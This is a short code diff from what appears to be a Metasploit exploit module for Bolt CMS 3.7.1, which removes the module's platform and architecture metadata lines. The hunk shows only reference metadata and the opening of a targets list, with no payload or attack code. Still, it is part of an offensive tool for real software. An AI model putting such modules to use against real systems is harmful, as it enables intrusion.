@@ -45,8 +45,6 @@ class MetasploitModule < Msf::Exploit::Remote
           ['EDB', '48296'],
           ['URL', 'https://github.com/bolt/bolt/releases/tag/3.7.1'] # Bolt CMS 3.7.1 release info mentioning this issue and the discovery by Sivanesh Ashok
         ],
-        'Platform' => ['linux', 'unix'],
-        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
         'Targets' => [
           [
             'Linux (x86)', {
